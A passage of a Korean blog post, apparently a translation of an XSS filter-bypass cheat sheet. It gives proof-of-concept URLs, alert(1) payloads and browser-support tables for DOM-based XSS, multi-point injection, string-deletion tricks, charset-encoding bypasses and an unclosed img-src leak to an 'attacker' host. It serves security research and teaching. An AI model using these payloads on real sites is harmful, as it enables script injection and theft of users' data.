XSS<\/h3>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>\uc774\uc804\uc5d0\ub294 \ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4 \ucc28\ub2e8\uc870\uac74\uc774 \uc874\uc7ac\ud588\uc74c. \ud604\uc7ac\ub3c4 \ucc28\ub2e8 \uc870\uac74\uc774 \ubd80\ubd84\uc801\uc73c\ub85c \ub0a8\uc544\uc788\uc9c0\ub9cc,<br>\uc774\uc804\uc5d0\ub294 \ucc28\ub2e8\ub418\uc5c8\ub358 location\uc5d0 \ub300\uc785\ud558\ub294 \uacf5\uaca9 \ubc29\ubc95\uc774 \ud5c8\uac00\ub418\uc5c8\uae30\uc5d0 \ud544\ud130\uac00 \uc5c6\ub294 \uac83\uacfc \ub9c8\ucc2c\uac00\uc9c0\uc784<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/str_literal?q=%22%3Blocation='javascript\\x3Aalert\\x281\\x29'\/\/\">https:\/\/vulnerabledoma.in\/bypass\/str_literal?q=%22%3Blocation=&#8217;javascript\\x3Aalert\\x281\\x29&#8217;\/\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script&gt;var q=\"\";location='javascript\\x3Aalert\\x281\\x29'\/\/\"&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\">\uc644\uc804\ud55c DOM based XSS<\/h3>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script&gt;\nhash=location.hash.slice(1);\ndocument.write(decodeURIComponent(hash));\n&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;body&gt;\n&lt;script&gt;\nhash=location.hash.slice(1);\ndocument.body.innerHTML=decodeURIComponent(hash);\n&lt;\/script&gt;\n&lt;\/body&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/dom_redirect#javascript:alert(1)\">https:\/\/vulnerabledoma.in\/bypass\/dom_redirect#javascript:alert(1)<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script&gt;\nlocation.href=decodeURIComponent(location.hash.slice(1));\n&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#1%E3%83%9A%E3%83%BC%E3%82%B8%E3%81%AB2%E3%81%A4%E4%BB%A5%E4%B8%8A%E3%81%AE%E6%B3%A8%E5%85%A5%E7%82%B9%E3%81%8C%E3%81%82%E3%82%8Bxss\"><\/a>2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0<\/h3>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=2&amp;q=%22src=data:,alert%25281%2529%3E%3C\/script%3E%3Cscript%20x=%22\">https:\/\/vulnerabledoma.in\/bypass\/text?type=2&amp;q=%22src=data:,alert%25281%2529%3E%3C\/script%3E%3Cscript%20x=%22<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;div&gt;\"src=data:,alert%281%29&gt;&lt;\/script&gt;&lt;script x=\"&lt;\/div&gt;\n&lt;div&gt;\"src=data:,alert%281%29&gt;&lt;\/script&gt;&lt;script x=\"&lt;\/div&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E6%96%87%E5%AD%97%E5%88%97%E3%81%AE%E6%93%8D%E4%BD%9C%E3%81%8C%E3%81%82%E3%82%8B%E5%A0%B4%E5%90%88-1\"><\/a>\ubb38\uc790\uc5f4 \uc870\uc791\uc774 \uc788\ub294 \uacbd\uc6b0<\/h3>\n\n\n\n<p>\uc77c\ubd80 \ubb38\uc790\uc5f4\uc774 \uc0ad\uc81c\ub418\uac70\ub098 \uce58\ud658\ub420 \ub54c \ud574\ub2f9 \ubb38\uc790\uc5f4\uc744 \ud398\uc774\ub85c\ub4dc \uc0ac\uc774\uc5d0 \ub123\uc5b4 \ucc28\ub2e8\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc74c<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%89%8A%E9%99%A4%E3%81%95%E3%82%8C%E3%82%8B%E5%A0%B4%E5%90%88-1\"><\/a>\uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0<\/h4>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=6&amp;q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?type=6&amp;q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;svg o&lt;script&gt;nload=alert(1)&gt;\n\u2193\n&lt;svg onload=alert(1)&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E7%BD%AE%E6%8F%9B%E3%81%95%E3%82%8C%E3%82%8B%E5%A0%B4%E5%90%88-1\"><\/a>\uce58\ud658\ub418\ub294 \uacbd\uc6b0<\/h4>\n\n\n\n<p>XSS \ud544\ud130\uac00 \uc815\uaddc\ud45c\ud604\uc2dd\uc5d0\uc11c <a href=\"https:\/\/speakerdeck.com\/masatokinugawa\/shibuya-dot-xss-techtalk-number-9?slide=50\">.\uc774 \uc758\ubbf8\ud558\ub294 \uae38\uc774<\/a> \uc774\uc0c1\uc73c\ub85c \uce58\ud658\ud558\ub294 \uacbd\uc6b0\uc5d0\ub294 \uc6b0\ud68c\ud560 \uc218 \uc788\uc74c<\/p>\n\n\n\n<p>\ub2e4\uc74c\uc758 \uacbd\uc6b0\uc5d0\ub294&lt;sc{r}ipt.*?&gt;\ub77c\ub294 \ucc28\ub2e8 \uc870\uac74\uc5d0 \ub9e4\uce58\ub418\uc9c0 \uc54a\ub3c4\ub85d &amp;\uac00 \uae38\uc774 \uc774\uc0c1\uc73c\ub85c \uce58\ud658\ub418\ub294 \ub3d9\uc791\uc744 \uc0ac\uc6a9\ud568<br>\/\ub294 0-3\uae00\uc790, &amp;\ub294 0-5\uae00\uc790\uc758 \uc640\uc77c\ub4dc\uce74\ub4dc\uc774\uae30 \ub54c\ubb38\uc5d0, \ucc28\ub2e8\ud560 \uc218 \uc788\ub294 \ucd5c\ub300 \uae38\uc774\ub294 8\uae00\uc790\uc784<br>\/&amp;\uac00 \uce58\ud658 \ud6c4 \ucd9c\ub825\ub418\ub294 \ubb38\uc790\uc5f4\uc740 10\uae00\uc790\uc774\uace0, \ucc28\ub2e8\ud560 \uc218 \uc788\ub294 \ucd5c\ub300 \uae38\uc774\uc778 8\uae00\uc790\ub97c \ub118\uc73c\ubbc0\ub85c \uc6b0\ud68c\uac00 \uac00\ub2a5\ud568<\/p>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=10&amp;q=%3Cscript\/%26%3Ealert(1)%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?type=10&amp;q=%3Cscript\/%26%3Ealert(1)%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script\/&amp;&gt;alert(1)&lt;\/script&gt;\n\u2193\n&lt;script\/&amp;amp;amp;&gt;alert(1)&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p> <strong>\ub2e4\uc74c\uc740 \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589\uc740 \ubd88\uac00\ub2a5\ud558\uc9c0\ub9cc \uc545\uc6a9\uc758 \uac00\ub2a5\uc131\uc774 \uc874\uc7ac\ud558\ub294 \uae30\ubc95\uc784<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%A4%96%E9%83%A8%E3%81%AB%E3%83%AA%E3%82%AF%E3%82%A8%E3%82%B9%E3%83%88%E3%82%92%E9%80%81%E4%BF%A1%E3%81%A7%E3%81%8D%E3%82%8B%E3%82%BF%E3%82%B0-1\"><\/a>\uc678\ubd80\uc5d0 \uc694\uccad\uc744 \ubcf4\ub0bc \uc218 \uc788\ub294 \ud0dc\uadf8<\/h3>\n\n\n\n<p>\uc774\ubbf8\uc9c0 \ud0dc\uadf8 \ub4f1\uc758 src \uc18d\uc131\uc758 \ud55c \ucabd\uc744 \ub2eb\uc9c0 \uc54a\uace0 \uc0ac\uc6a9\ud558\uc5ec \ubbfc\uac10 \uc815\ubcf4\ub97c \ub9ac\ud018\uc2a4\ud2b8\uc5d0 \ud3ec\ud568\uc2dc\ud0ac \uc218 \uc788\uc74c<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=8&amp;q=%3Cimg%20src=%22https:\/\/attacker\/?data=\">https:\/\/vulnerabledoma.in\/bypass\/text?type=8&amp;q=%3Cimg%20src=%22https:\/\/attacker\/?data=<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;p&gt;&lt;img src=\"https:\/\/attacker\/?data=&lt;\/p&gt;\n&lt;p&gt;This is a secret text.&lt;\/p&gt;\n&lt;p id=\"x\"&gt;AAA&lt;\/p&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E3%83%90%E3%82%A4%E3%83%91%E3%82%B9-1\"><\/a>\ud544\ud130 \uc6b0\ud68c<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><strike><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#xml-namespace%E3%81%AB%E5%81%BD%E8%A3%85%E3%81%97%E3%81%9F%E6%96%87%E5%AD%97%E5%88%97%E3%81%AE%E5%88%A9%E7%94%A8edge%E3%81%AE%E3%81%BF\"><\/a>XML namespace\ub85c \uc704\uc7a5\ud55c \ubb38\uc790\uc5f4 \uc0ac\uc6a9<\/strike><\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uacf5\uaca9 \ud0c0\uac9f\uc774 flash\ub97c \uc774\uc6a9 \uac00\ub2a5<\/li><li><code>X-XSS-Protection:1; mode-block<\/code>\ud5e4\ub354\uac00 \uc788\uc9c0 \uc54a\uc74c<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>Edge\ub294 XML namespace\uac00 \ubd99\uc9c0 \uc54a\uc740 \ud0dc\uadf8\ub3c4 \ucc28\ub2e8\ud568. &lt;embed\/:script \ub85c \ub418\uc5b4\uc788\ub294 \ubb38\uc790\uc5f4\uc744 \ubcf4\ud1b5\uc758 HTML\uc5d0\uc11c \uc0ac\uc6a9\ud558\uba74<br>\uc6d0\ub798 embed\ud0dc\uadf8\ub85c \ud574\uc11d\ud574\uc57c \ud560 \uac83\uc744, script\ud0dc\uadf8\ub85c \ud574\uc11d\ud574 \ucc28\ub2e8\uc5d0 \uc2e4\ud328\ud568.<br>\uadf8\ub7ec\ub098 \ucc28\ub2e8 \ub3d9\uc791\uc740 \uc2e4\ud589\ub418\uc5c8\uae30\uc5d0 X-XSS-Protection:1; mode-block\ud5e4\ub354\uac00 \uc874\uc7ac\ud560 \uacbd\uc6b0\uc5d0 \uc6b0\ud68c\uac00 \ubd88\uac00\ub2a5\ud568<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/masatokinugawa.l0.cm\/2016\/12\/xss9.html\">https:\/\/masatokinugawa.l0.cm\/2016\/12\/xss9.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cembed\/:script%20allowscriptaccess=always%20src=\/\/l0.cm\/xss.swf%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cembed\/:script%20allowscriptaccess=always%20src=\/\/l0.cm\/xss.swf%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;embed\/:script allowscriptaccess=always src=\/\/l0.cm\/xss.swf&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Microsoft Edge 41 \uae30\uc900\uc73c\ub85c \ud574\ub2f9 \uae30\ubc95\uc740 \ud328\uce58\ub418\uc5b4 \ub354\uc774\uc0c1 \ud1b5\ud558\uc9c0 \uc54a\uc74c\uc744 \ud655\uc778\ud568<\/p><\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#hz-gb-2312%E3%81%AE%E3%82%A8%E3%82%B9%E3%82%B1%E3%83%BC%E3%83%97%E3%82%B7%E3%83%BC%E3%82%B1%E3%83%B3%E3%82%B9%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>HZ-GB-2312 \uc774\uc2a4\ucf00\uc774\ud504 \uc2dc\ud000\uc2a4 \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\ud398\uc774\uc9c0\uc5d0 Content-Type \uc9c0\uc815\uc774 \uc5c6\uc74c<\/li><\/ol>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/masatokinugawa.l0.cm\/2015\/09\/xss7.html\">https:\/\/masatokinugawa.l0.cm\/2015\/09\/xss7.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;x~\nonfocus=alert(1) id=a tabindex=0&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E3%83%8A%E3%83%93%E3%82%B2%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E6%99%82%E3%81%AE%E3%82%A8%E3%83%B3%E3%82%B3%E3%83%BC%E3%83%89%E5%8B%95%E4%BD%9C%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>\ud398\uc774\uc9c0 \uc774\ub3d9\uc2dc\uc758 \uc778\ucf54\ub529 \ub3d9\uc791\uc758 \uc774\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>GET \uba54\uc18c\ub4dc\ub97c \ud1b5\ud55c Reflected XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>IE\/Edge\ub294 \ud398\uc774\uc9c0\ub97c \uc774\ub3d9\ud560 \ub54c \uc774\ub3d9 \uc804\uc758 \ud398\uc774\uc9c0\uc758 \uc5b8\uc5b4\uc14b\uc73c\ub85c \ucffc\ub9ac \ubb38\uc790\uc5f4\uc744 \uc778\ucf54\ub529\ud574 \ub9ac\ud018\uc2a4\ud2b8\ub97c \ubcf4\ub0c4<br>\uc774 \ub54c XSS \ud544\ud130\ub294 \uc804\uc1a1\ub418\ub294 \ub9ac\ud018\uc2a4\ud2b8\uac00 \uc544\ub2cc \uc778\ucf54\ub529 \ub41c \ubb38\uc790\uc5f4\uc744 \uccb4\ud06c\ud558\ub294 \uac83\uc73c\ub85c \ucd94\uc815\ub428<br>\uc778\ucf54\ub529\ub41c \ubb38\uc790\uc5f4\uacfc \uc2e4\uc81c \uc804\uc1a1\ub41c \ubb38\uc790\uc5f4\uc774 \ubd88\uc77c\uce58 \ud560 \ub54c \uc6b0\ud68c\uac00 \uac00\ub2a5\ud568<br>\uc774\ud558\uc758 PoC\uc5d0\uc11c\ub294 \uc608\uc2dc\ub97c \uc704\ud574 x-chinese-cns\uc744 \uc0ac\uc6a9\ud568<br>x-chinese-cns\uc5d0\uc11c\ub294 \u65e1 \ubb38\uc790\uc5f4\uc774 0xA13E\uc5d0 \ub9e4\ud551\ub418\uc5b4 \uc788\uc74c<br>\uc774 \ub54c x-chinese-cns  \uc5b8\uc5b4\uc14b\uc73c\ub85c \uc124\uc815\ub41c \ud398\uc774\uc9c0\uc5d0\uac8c &lt;script\/\u65e1 \ubb38\uc790\uc5f4\uc744 Reflected XSS \ud398\uc774\ub85c\ub4dc\uc5d0 \ud3ec\ud568\uc2dc\ucf1c \uc804\uc1a1 \ud560 \uacbd\uc6b0,<br>\uc804\uc1a1\ub418\ub294 Request\ub294 \u65e1 \ubb38\uc790\uc5f4\uc744 UTF-8\uc774 \uc544\ub2cc x-chinese-cns\ub85c \uc778\ucf54\ub529\ud558\uc5ec  &lt;script\/0xA1&gt;(0x3E\ub294 &gt;)\uac00 \ub428<br>\uacb0\uacfc\uc801\uc73c\ub85c \ud398\uc774\uc9c0\uc5d0 &lt;script&gt;\uac00 \uc4f0\uc5ec\uc9d0<br>\ubcf4\ud1b5\uc758 \uacbd\uc6b0\uc5d0\ub294 &lt;script&gt;\ud0dc\uadf8\uac00 XSS \ud544\ud130\uc5d0 